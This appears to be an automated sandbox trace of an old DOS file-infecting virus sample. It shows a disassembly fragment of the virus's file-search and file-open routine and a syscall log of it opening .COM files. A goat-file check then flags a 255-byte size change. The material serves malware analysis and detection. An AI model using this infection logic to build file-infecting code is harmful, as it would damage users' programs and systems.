Sample viewer

vx.netlux.org/Virus.DOS.Made.255.b

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:50:30.126167536Z 44 PC: 1412d | Get time
0x1412d: cmp dh, 0xf
0x14130: jle 0x14140
0x14132: cmp dl, 0
0x14135: je 0x14129
0x14137: cmp dh, 0
0x1413a: je 0x14129
0x1413c: mov word ptr [si + 0x116], dx
0x14140: mov bp, word ptr [si + 0x1fc]
0x14144: add bp, 0x103
0x14148: mov ah, 0x1a
0x1414a: lea dx, word ptr [si + 0x20a]
0x1414e: int 0x21
0x14150: lea dx, word ptr [si + 0x1fe]
0x14154: xor cx, cx
0x14156: mov ah, 0x4e
0x14158: int 0x21
0x1415a: jb 0x141c6
0x1415c: mov ax, 0x3d02
0x1415f: lea dx, word ptr [si + 0x228]
0x14163: int 0x21
2018-12-17T22:50:30.129394904Z 26 PC: 14150 | Set disk transfer address
2018-12-17T22:50:30.13054431Z 78 PC: 1415a | Find first file
2018-12-17T22:50:30.137001318Z 61 PC: 14165 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:50:30.144644275Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 5)
2018-12-17T22:50:30.151096776Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.153901841Z 61 PC: 14165 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:50:30.161130336Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 6)
2018-12-17T22:50:30.167620541Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.170502719Z 61 PC: 14165 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:50:30.178507118Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 7)
2018-12-17T22:50:30.185444973Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.188325073Z 61 PC: 14165 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:50:30.195615545Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 8)
2018-12-17T22:50:30.202510517Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.20516669Z 61 PC: 14165 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:50:30.21174825Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 9)
2018-12-17T22:50:30.218690467Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.221267637Z 61 PC: 14165 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:50:30.22762927Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 10)
2018-12-17T22:50:30.234859245Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.237650405Z 61 PC: 14165 | Open file (Filename = 'PAH.COM')
2018-12-17T22:50:30.244204017Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 11)
2018-12-17T22:50:30.251265138Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.254752572Z 61 PC: 14165 | Open file (Filename = 'TEST.COM')
2018-12-17T22:50:30.261879086Z 63 PC: 141cc | Read file or device (Read 3 bytes on handle 12)
2018-12-17T22:50:30.265264986Z 66 PC: 1418a | Move file pointer
2018-12-17T22:50:30.266952142Z 63 PC: 141cc | Read file or device (Read 2 bytes on handle 12)
2018-12-17T22:50:30.270146414Z 79 PC: 1415a | Find next file
2018-12-17T22:50:30.279452521Z 48 PC: 12a63 | Get DOS version
2018-12-17T22:50:30.280824579Z 9 PC: 12a7a | Display string (String= ' --=[ Selfchecking AntiStealth Goat COM/EXE file, 01/06/01 ]=------------------ (c) 1995-2001 by ROSE SWE, Dipl.-Ing. Ralph Roth - Version 1.18 - Freeware ')
2018-12-17T22:50:30.290647029Z 61 PC: 12cb7 | Open file (Filename = '')
2018-12-17T22:50:30.297655918Z 9 PC: 12a88 | Display string (String= 'Self test: ')
2018-12-17T22:50:30.299212536Z 93 PC: 12b24 | File sharing functions
2018-12-17T22:50:30.300576763Z 9 PC: 12b03 | Display string (String= 'Size change=+00FFh/00255d. Virus might be activ? ')
2018-12-17T22:50:30.304293714Z 76 PC: 12b09 | Terminate with return code (Return code = '1')